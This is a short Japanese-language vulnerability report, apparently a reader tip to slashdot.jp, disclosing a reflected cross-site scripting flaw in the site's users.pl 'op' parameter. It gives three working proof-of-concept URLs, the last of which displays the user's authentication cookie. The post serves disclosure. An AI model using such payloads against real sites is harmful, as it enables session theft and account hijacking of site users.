slashdot.jpにクロスサイトスクリプティング脆弱性
タレコミ by TAKAGI, Hiromitsu
TAKAGI, Hiromitsu 曰く、
slashdot.jpにクロスサイトスクリプティング脆弱性を発見したので報告します。
- クロスサイトスクリプティング脆弱性の存在確認テスト
http://srad.jp/users.pl?op=%3CS%3Etest%3C/S%3E- スクリプトを実行させるテスト
http://srad.jp/users.pl?op=%3CSCRIPT%3Ealert('hello')%3C/SCRIPT%3E- slashdot.jp認証用のcookieデータを画面に表示させるテスト
http://srad.jp/users.pl?op=%3CSCRIPT%3Edocument.write(unescape(unescape(document.cookie)))%3C/SCRIPT%3E